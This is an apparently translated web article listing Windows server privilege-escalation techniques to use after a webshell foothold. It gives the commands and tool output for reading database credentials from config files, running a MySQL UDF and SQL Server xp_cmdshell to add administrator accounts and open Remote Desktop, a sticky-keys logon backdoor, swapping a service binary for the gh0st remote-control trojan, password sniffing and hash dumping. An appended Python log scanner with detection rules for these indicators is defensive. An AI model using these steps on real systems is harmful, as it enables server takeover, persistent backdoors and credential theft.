Details about alternative technologies for server Elevation of Privilege

Source: Internet
Author: User

1. Search for configuration files (config.asp, config.php, conn.asp, the inc directory) under the website directory to find accounts and passwords with high privileges.

For example, the MySQL root password or the SQL Server sa password. A typical Discuz config.php looks like this:

<?php
// [CH] Modify the following variables according to the account parameters provided by the hosting provider. If in doubt, contact the server provider.
$dbhost = 'localhost';   // Database server
$dbuser = 'root';        // Database username
$dbpw = '123';           // Database password
$dbname = 'discuz';      // Database name
$pconnect = 0;           // Database persistent connection: 0 = off, 1 = on
?>
 
This yields the root account credentials: username root, password 123.
 
Privilege escalation using MySQL root (output of the UDF-based webshell tool):

DLL has been successfully exported to c:\windows\system32\mysqlDll_1269695183.dll
Function state already exists
Select state("net user yhsafe /add")
Successful SQL statement execution: Resource id #2
Array
(
    [0] => the command is successfully completed.
    Succeed!
    [State ("net user yhsafe /add")] => the command is successfully completed.
    Succeed!
)
 
Privilege escalation using the SQL Server sa account

Connection string: Server=localhost;UID=sa;PWD=123;database=master;Provider=SQLOLEDB

If xp_cmdshell does not execute, re-enable xp_cmdshell first.

Exec master.dbo.xp_cmdshell 'net user yhsafe.com yhsafe /add'
Exec master.dbo.xp_cmdshell 'net localgroup administrators yhsafe.com /add'

Enable 3389 (Remote Desktop):

Exec master.dbo.xp_cmdshell 'C:\inetpub\wwwroot\bs3389.exe 3389'

Returned result:

Now opening terminate service... Success!
5.2
OK...
Enabled successfully
 
2. Escalate privileges by exploiting software configuration vulnerabilities or local overflows.

"Brazilian barbecue" privilege escalation:

Run ch.exe "net user 123 123 /add" in the webshell.

360 privilege escalation:

360.exe 3389 // Remote Desktop is enabled.

Press Shift five times at the logon screen to pop up a CMD window.
 
3. Service replacement method

Target: C:\ftp\FtpServer.exe

Rename FtpServer.exe to FtpServer1.exe.

Upload a reverse-connecting remote control program, for example gh0st.

Rename the gh0st binary to FtpServer.exe so it runs in place of the service.
 
4. Sniffing from the webshell

FTP and HTTP passwords across the entire server can be sniffed.

A professional tool such as Wireshark is required to view the captured passwords.
 
5. Dumping passwords

Dumping requires administrator or even SYSTEM privileges.

Dump the hashes to further penetrate the intranet.
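As an added defender-side example (not part of the original text), the following Python scans log lines for the traces the escalation paths above leave behind: a UDF DLL dropped into system32, the standard CREATE FUNCTION ... SONAME statement that registers a MySQL UDF, xp_cmdshell use, and net user / net localgroup ... /add. The sample events and rule names are constructed for this example.

```python
import re

# Detection rules for the escalation indicators discussed on this page.
# Each entry is (rule name, compiled regex); names are constructed here.
RULES = [
    ("mysql_udf_dll_in_system32",
     re.compile(r"system32\\mysqldll_\w+\.dll", re.I)),
    ("mysql_udf_create_function",
     re.compile(r"\bcreate\s+function\s+\w+\s+returns\s+\w+\s+soname\b", re.I)),
    ("mssql_xp_cmdshell",
     re.compile(r"\bxp_cmdshell\b", re.I)),
    ("local_user_added",
     re.compile(r"\bnet\s+user\s+\S+(\s+\S+)?\s+/add\b", re.I)),
    ("added_to_administrators",
     re.compile(r"\bnet\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
]


def match_rules(line):
    """Return the names of every rule that fires on a single log line."""
    return [name for name, rx in RULES if rx.search(line)]


def scan_events(lines):
    """Scan log lines; return (line_no, rule, line) for every rule hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        for rule in match_rules(line):
            hits.append((n, rule, line.strip()))
    return hits


# Constructed sample events (not real logs) mirroring the page's indicators.
SAMPLE_EVENTS = [
    "10:00:00 sysmon: FileCreate TargetFilename=C:\\Windows\\System32\\mysqlDll_1269695183.dll Image=mysqld.exe",
    "10:00:01 mysqld general_log: create function state returns string soname 'mysqlDll_1269695183.dll'",
    "10:00:02 mysqld general_log: select state('net user yhsafe /add')",
    "10:02:09 mssql: exec master.dbo.xp_cmdshell 'net user yhsafe.com yhsafe /add'",
    "10:02:10 sysmon: ParentImage=sqlservr.exe CommandLine=net localgroup administrators yhsafe.com /add",
    "10:03:00 iis: GET /index.php 200",
]

if __name__ == "__main__":
    for line_no, rule, line in scan_events(SAMPLE_EVENTS):
        print(f"line {line_no}: {rule}: {line}")
```

Feeding the MySQL general log, SQL Server error log and process-creation events into scan_events gives a first-pass alert for each of the paths described above.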
